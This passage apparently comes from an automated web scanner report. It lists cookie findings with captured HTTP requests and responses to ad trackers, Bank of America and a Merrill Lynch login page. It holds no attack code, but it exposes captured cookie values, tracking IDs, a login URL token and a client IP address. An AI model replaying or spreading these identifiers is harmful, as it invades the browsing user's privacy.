anj=Kfu=8fG2<rgj[2<?0P(*AuB-u**g1:XIBUIEhzW()U9M1V)`B-9_(ygo7z0v4(^Nf$5@f1epA2Sw6La@%rmg/R-$1/uc>#?+!_/VvS?PF*yU-C4_rx!NEq)w+(RJbbKYr/.fmNX[=5u*'fkg>GB`St%p.uU(f#6kDukULq8/6Chj_YZn-BImfAMpaUTmN7*joV9bN)jmf5I]snH/]xnzH[iw%qgjwh>p+^cZz<R-eMV?4^a>]$!X9^RDTuLuZpK9=dIc/-`$T$goi.=oVzyWz'.(.XYco!RC'>1Qx(W`nwzUj?YH[J$3nv-KK#-iL$QJfrZbdN+(BosBCiJ'm<TIMEqIboyNV)q=Qp[*@Cf#8I-v%(BIP1j2)__HclCm<*N6uMz?9EChIE6Heba3v9eO'3D=f6?$k1DsLHwO4.ddbEp]y:s8ZIDamDmL[vt]Y?BqbrQnoc@iD:G@#d1R07d]E9#M:?dTed^`/$a<!%MSD0+[NQkt?PxChdO7dL8Xcmrl6eV=s'xP'kk61c7qYk; sess=1
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pxj?bidder=55&action=SetAdMarketCookies(%22AA002%3d1303072666-9018543%7cMUID%3db506c07761d7465d924574124e3c14df%7cTOptOut%3d0%7cEANON%3dA%253d0%2526E%253dFFF%2526W%253d1%22); HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfu=8fG4S]gj[2<?0P(*AuB-u**g1:XIF9]EhzW()U9M1V)`B-9_(ygo7z0v4(^Nf$5@f1epA2Sw6La@%rmg/R-$1/uc>#?+!_/VvS?PF*yU-C4_rx!NEq)w+(RJbbKYr/.fmNX[=5u*'fkg>GB`St%p.uU(f#6kDukULq8/6Chj_YZn-BImfAMpaUTmN7*joV9bN)jmf5I]snH/]xnzH[iw%qgjwh>p+^cZz<R-eMV?4^a>]$!X9^RDTuLuZpK9=dIc/-`$T$goi.=oVzyWz'.(.XYco!RC'>1Qx(W`nwzUj?YH[J$3nv-KK#-iL$QJfrZbdN+(Bo3KgX#`c5]qvg^lIg`K'/jYd`<2[cP$Mn.k).`o#?[DvFCmKS]_Rn]AnwyPLgc8R]HmkeLCt7wt+CdMJIY(Q8dnxZw!E9DDGh)[$QnR%ndJcRbu@?$Pk*eA85bgvgm.WQEeO/56q?$4$_+(]sS//QhH(L+o:.t`@]S2kvs7O@m7UZqq?WyPmfoNWxM!.CjYr2V.i
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Wed, 27-Apr-2011 14:21:16 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 14:21:16 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 14:21:16 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG4S]gj[2<?0P(*AuB-u**g1:XIF9]EhzW()U9M1V)`B-9_(ygo7z0v4(^Nf$5@f1epA2Sw6La@%rmg/R-$1/uc>#?+!_/VvS?PF*yU-C4_rx!NEq)w+(RJbbKYr/.fmNX[=5u*'fkg>GB`St%p.uU(f#6kDukULq8/6Chj_YZn-BImfAMpaUTmN7*joV9bN)jmf5I]snH/]xnzH[iw%qgjwh>p+^cZz<R-eMV?4^a>]$!X9^RDTuLuZpK9=dIc/-`$T$goi.=oVzyWz'.(.XYco!RC'>1Qx(W`nwzUj?YH[J$3nv-KK#-iL$QJfrZbdN+(Bo3KgX#`c5]qvg^lIg`K'/jYd`<2[cP$Mn.k).`o#?[DvFCmKS]_Rn]AnwyPLgc8R]HmkeLCt7wt+CdMJIY(Q8dnxZw!E9DDGh)[$QnR%ndJcRbu@?$Pk*eA85bgvgm.WQEeO/56q?$4$_+(]sS//QhH(L+o:.t`@]S2kvs7O@m7UZqq?WyPmfoNWxM!.CjYr2V.i; path=/; expires=Mon, 25-Jul-2011 14:21:16 GMT; domain=.adnxs.com; HttpOnly Content-Length: 43 Content-Type: image/gif Date: Tue, 26 Apr 2011 14:21:16 GMT
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /seg?add=115983&t=2 HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://response.firstdata.com/?elqPURLPage=15 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; anj=Kfu=8fG7DHErkX00s]#%2L_'x%SEV/i#-(K4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`?^BL$+7#i$pT[s3jed7tfA1`pEJi?I'cetE@w$C=m_FErWsLkh?FBhA1/nWX9nBJjakYDtOsm*%>P1iWYn<C566r^)=`aZspsOeXr[Az(5mYHslaBH24%8e!G9^o8qHu1d<wou'>X:8EqWdzVt2pM8f4+c0KOudMU-dso-!sL8GKjFFV)#59[MNNPUYSv$Nw]68]%Y4DA:6p(K:kXc3s6r=0S6u_D96a?e(y#41L9al82/B^9JOJNhAmivW-R#3@lZ'D<[DQE!2V#^M^'oM=E]2j]yUTqG`bWR!yb-mQiJH(KxkF9(^4Z[?Rks(K9>2.t`@]S#.Pi-s@M.gKfz]>NjwEsq(Q8!6Gfbik=DN; sess=1; uuid2=2724386019227846218
Response
HTTP/1.1 302 Found Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Tue, 26-Apr-2011 23:45:15 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 24-Jul-2011 23:45:15 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 24-Jul-2011 23:45:15 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfw)(CV[km)_aRW^?69VO%^t@wc@KZSuE1Lu-->vY4Kg0Az?az^UuCpkfHEJVaJC4O@h?n0.t6VUPf:rOFre44`![.J`/(=cCACtrwdFhESV#0H@:v#%GAx/a[[bmjFt_qg$us_3LNCC#VsKXc<y<:l)8ue*S6ZaLu:suJ>!A'(fu25g[:R^v*`Go8nCr3`mcO!!Y0nygZOmn]rud_2g9`Evjg`%GgOEg#nG@zpw:oYf$UHxBK1`KkRo/.b16?^T@ES5$l%j6.YiS+'Dk]H?AlcSDn-e'vVGz>g7]v?O[krl2#^`JQ=fFGT`iWd?JWtX/7x'[R0byh((Pra?zgDswJcXMcNSV%Y?rzL?YSE?(EJP0^5AdJVLNte$gV%Gt9?Wbc75VaLc'rv_B0^w#9-o#S5e[(<(H7@KL:1xLV5r0x$KI-_S1[c(gcm^P`)bA>ESdT?7e:Vot*1Z(>C_rc2I_PIQcBF2f*sOwQVJ4*JX:0'2(8In?'J$c773Nk?ri*MFFCYw[Apvc0H^z; path=/; expires=Sun, 24-Jul-2011 23:45:15 GMT; domain=.adnxs.com; HttpOnly Location: http://aidps.atdmt.com/AI/Api/v1/UserRest.svc/Provider/1AC1C520-232B-4E3D-B0CC-A52AC15EB7D4/User/2724386019227846218/gif?meta=appNexus Date: Mon, 25 Apr 2011 23:45:15 GMT Content-Length: 0
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pcha/homepage HTTP/1.1 Host: mydownload.paretologic.safecart.com Proxy-Connection: keep-alive Referer: http://www.cleanallspyware.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /login/login.aspx?sgt=3&_tps=53e1d1d2ef5543dabbbb6e0d12a34f8b HTTP/1.1 Host: olui2.fs.ml.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ps/?pid=454&uid=4dab4fa85facd099 HTTP/1.1 Host: pixel.33across.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com/static/r07/sh39.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 33x_ps=u%3D7527692047%3As1%3D1303122295815%3Ats%3D1303122295815
Response
HTTP/1.1 200 OK P3P: CP='NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA' Set-Cookie: 33x_ps=u%3D7527692047%3As1%3D1303122295815%3Ats%3D1303122295815; Domain=.33across.com; Expires=Tue, 24-Apr-2012 23:45:34 GMT; Path=/ Pragma: no-cache Cache-Control: no-store, no-cache, must-revalidate Expires: Thu, 01-Jan-70 00:00:01 GMT X-33X-Status: 0 Content-Type: image/gif Content-Length: 43 Date: Mon, 25 Apr 2011 23:45:33 GMT Connection: close Server: 33XG1
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pixel.jsp?id=2773,2759,2761,2791&type=script&ipid=10143&sfid=0 HTTP/1.1 Host: pixel.intellitxt.com Proxy-Connection: keep-alive Referer: http://spamlaws.us.intellitxt.com/iframescript.jsp?src=http%3A%2F%2Fpixel.intellitxt.com%2Fpixel.jsp%3Fid%3D2773%2C2759%2C2761%2C2791%26type%3Dscript%26ipid%3D10143%26sfid%3D0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgEAAAEvki8pzwA-
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Set-Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eoAAACucBAAAAAQAAAS+SL16gAAAK1QEAAAABAAABL5IvXqAAAArHAQAAAAEAAAEvki9eoAAAAACIhXZ+; Domain=.intellitxt.com; Expires=Sat, 25-Jun-2011 14:21:08 GMT; Path=/ Content-Type: text/html Content-Length: 1602 Date: Tue, 26 Apr 2011 14:21:08 GMT Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pixel;r=1431229252;fpan=1;fpa=P0-633902152-1303780517296;ns=0;url=http%3A%2F%2Fwww.slaviks-blog.com%2F;ref=;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1303780517295;tzo=300;a=p-18-mFEk4J448M;labels=type.wporg HTTP/1.1 Host: pixel.quantserve.com Proxy-Connection: keep-alive Referer: http://www.slaviks-blog.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=EEIAFu8kjVmtjIMLyxuBAVcBzAaBsQDe0kykaNQqOxjlwfsgkgy4F8MIOBvVeCCuOB_xAA6JIAEC22ekMA
Response
HTTP/1.1 204 No Content Connection: close Set-Cookie: d=ECMAFu8kjVmtjIMLyxuBAVcBzQaB0QDe0kykaNQqOxjlwfsgkgy4F8MIOBvVeCCuOB_xAA6JIAEC22ekMA; expires=Mon, 25-Jul-2011 01:21:18 GMT; path=/; domain=.quantserve.com P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV" Cache-Control: private, no-cache, no-store, proxy-revalidate Pragma: no-cache Expires: Fri, 04 Aug 1978 12:00:00 GMT Date: Tue, 26 Apr 2011 01:21:18 GMT Server: QS
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /click/16008;128708;94221;230;3/?url=http://response.firstdata.com/?elqPURLPage=15 HTTP/1.1 Host: servedby.flashtalking.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Found Date: Mon, 25 Apr 2011 23:44:06 GMT Server: Jetty(6.1.22) Cache-Control: no-cache, no-store Content-Length: 0 P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Set-Cookie: flashtalkingad1="GUID=12106DCD478E8B";Path=/;Domain=.flashtalking.com;Expires=Wed, 24-Apr-13 23:44:06 GMT pragma: no-cache Location: http://response.firstdata.com/?elqPURLPage=15 Via: 1.1 mdw061001 (MII-APC/1.6) Content-Type: text/plain
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /snap_shots.js HTTP/1.1 Host: shots-s.snap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
//<!-- /*! Snap Shots Code Copyright (c) 2009, Snap Technologies, Inc. All rights reserved. * Your use of this code is subject to the Snap Shots Terms of Service * located at https://account.snap ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/v6.59/snip/arrow-contd/89fdd0457a773fb9e78a2ee3e0b8ebd3/d/pf/p3247/arrow/ HTTP/1.1 Host: shots.snap.com Proxy-Connection: keep-alive Referer: http://www.slaviks-blog.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots%26call%3D1%26time%3D1303780536; session=id%3D750141ed4012a61dd2504f021aabfdfe%26time%3D1303780536%26created_time%3D1303780536%26destination_url%3Dhttp%253A%252F%252Fshots.snap.com%252Frk.php%253Furl%253Dhttp%25253A%25252F%25252Fwww.mcafee.com%25252Fus%25252Fresources%25252Fsolution-briefs%25252Fsb-lizamoon-sql-injection.pdf%2526key%253D6e8afd4f63cdc7886a3f718aa78c7375%2526lang%253Den-us%2526th%253Dsilver%2526src%253Dwww.slaviks-blog.com%2526cp%253DShotsense%2526s%253Dsmall%2526svc%253D%2526tag%253D%2526atext%253Dposted%2526title%253DMusings%252520on%252520Database%252520Security%2526dfs%253D10%2526call%253D0%2526uid%253D16266132404ce087181f51bbd2d1a9b9%2526vid%253D89fdd0457a773fb9e78a2ee3e0b8ebd3%2526fl%253Dnull%2526size%253D320x79%26referrer%3Dhttp%253A%252F%252Fwww.slaviks-blog.com%252F%26call%3D1
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /preview/?url=http%3A%2F%2Fwww.mcafee.com%2Fus%2Fresources%2Fsolution-briefs%2Fsb-lizamoon-sql-injection.pdf&key=6e8afd4f63cdc7886a3f718aa78c7375&src=www.slaviks-blog.com&cp=&sb=1&v=6.59&size=small&lang=en-us&search_type=spasense&vis=0&origin=shots_bubble&act=only_link&po=0&rp=null&tok=00034db816da48d6409a1a9cffc9091a0226f9839f&has_img=0&ol=0&ex=0&ad=unknown&ip=173.193.214.243&ua=Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%29+AppleWebKit%2F534.16+%28KHTML%2C+like+Gecko%29+Chrome%2F10.0.648.205+Safari%2F534.16&vid=89fdd0457a773fb9e78a2ee3e0b8ebd3&nl=0&referrer=http%3A%2F%2Fwww.slaviks-blog.com%2F&svc=&rt=1303780546551&view_id=89fdd0457a773fb9e78a2ee3e0b8ebd3&goto=Go%20to%20%25URL&direct=1&sc=2&rss=1 HTTP/1.1 Host: shots.snap.com Proxy-Connection: keep-alive Referer: http://www.slaviks-blog.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /shot/?url=http%3A%2F%2Fwww.mcafee.com%2Fus%2Fresources%2Fsolution-briefs%2Fsb-lizamoon-sql-injection.pdf&key=6e8afd4f63cdc7886a3f718aa78c7375&src=www.slaviks-blog.com&cp=&sb=1&v=6.59&size=small&lang=en-us&search_type=spasense&vis=0&origin=shots_bubble&act=only_link&po=0&rp=null&tok=00034db816da48d6409a1a9cffc9091a0226f9839f&has_img=0&ol=0&ex=0&ad=unknown&ip=173.193.214.243&ua=Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%29+AppleWebKit%2F534.16+%28KHTML%2C+like+Gecko%29+Chrome%2F10.0.648.205+Safari%2F534.16&vid=89fdd0457a773fb9e78a2ee3e0b8ebd3&nl=0&referrer=http%3A%2F%2Fwww.slaviks-blog.com%2F&svc=&rt=1303780546551&w=320&h=207&target=_blank&tag=&goto=Go%20to%20%25URL&sc=1 HTTP/1.1 Host: shots.snap.com Proxy-Connection: keep-alive Referer: http://www.slaviks-blog.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /snap_shots.js?ap=1&si=0&key=6e8afd4f63cdc7886a3f718aa78c7375&sb=0&link_icon=on&oi=0&cl=0&po=0&th=green&preview_trigger=icon&domain=www.slaviks-blog.com HTTP/1.1 Host: shots.snap.com Proxy-Connection: keep-alive Referer: http://www.slaviks-blog.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
//<!-- /*! Snap Shots Code Copyright (c) 2009, Snap Technologies, Inc. All rights reserved. * Your use of this code is subject to the Snap Shots Terms of Service * located at https://account.snap ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /al.asp?ts=20110426142115&adid=0%2C0%2C0%2C0%2C4513%2C0&cc=us&di=31742909%2C31742907%2C31742978%2C31326997%2C31051141%2C31326990&hk=1&ipid=10143&mh=b5e073b8ec12fc1181fc2fd3b1a46a79&pid=2%2C2%2C2%2C2%2C2%2C2&pvm=35e167e1c66fee62be98fe397190a726&pvu=59196390591647FA9372FACB8C10DBA5&rcc=us&so=0&syid=0%2C0%2C0%2C0%2C0%2C0&uf=0%2C0%2C0%2C0%2C0%2C0&ur=0%2C0%2C0%2C0%2C0%2C0&kp=327%2C302%3B265%2C378%3B722%2C499%3B581%2C620%3B401%2C989%3B319%2C1289%3B&prf=ll%3A5003%7Cintl%3A6792%7Cpreprochrome%3A2%7Cgetconchrome%3A56%7Cadvint%3A6889%7Cadvl%3A6889%7Ctl%3A9596&jscallback=$iTXT.js.callback1 HTTP/1.1 Host: spamlaws.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.spamlaws.com/spam-blocker.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgEAAAEvki8pzwA-
Response
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgEAAAEvki8pzwA-; Domain=.intellitxt.com; Expires=Sat, 25-Jun-2011 14:21:08 GMT; Path=/ Content-Type: text/javascript Content-Length: 38 Date: Tue, 26 Apr 2011 14:21:08 GMT Age: 0 Connection: keep-alive
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /intellitxt/front.asp?ipid=10143 HTTP/1.1 Host: spamlaws.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.spamlaws.com/spam-blocker.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LAEAAAEviQskDAA-
Response
HTTP/1.1 200 OK P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgEAAAEvki8vJgA-; Domain=.intellitxt.com; Expires=Sat, 25-Jun-2011 14:20:56 GMT; Path=/ Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgEAAAEvki8vJgA-; Domain=.intellitxt.com; Expires=Sat, 25-Jun-2011 14:20:56 GMT; Path=/ Content-Type: application/x-javascript Vary: Accept-Encoding Date: Tue, 26 Apr 2011 14:20:56 GMT Age: 0 Connection: keep-alive Content-Length: 11702
document.itxtDisabled=1; document.itxtDebugOn=false; if(document.itxtDisabled){ document.itxtInProg=1; if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /c HTTP/1.1 Host: tc.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; state=MA; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; hp_beta=B; cmTPSet=Y; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; TLTSID=0391ABCE700010701FF8C9030944B980; throttle_value=35;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pcha/download?3562113 HTTP/1.1 Host: threats2.paretologic.safecart.com Proxy-Connection: keep-alive Referer: http://www.cleanallspyware.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: paretologic=4L4db6cea6aaf4b16-mydownload-rwire
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/?page=login&cmd=approval&a=1">here</a>.</body>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.bankofamerica.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
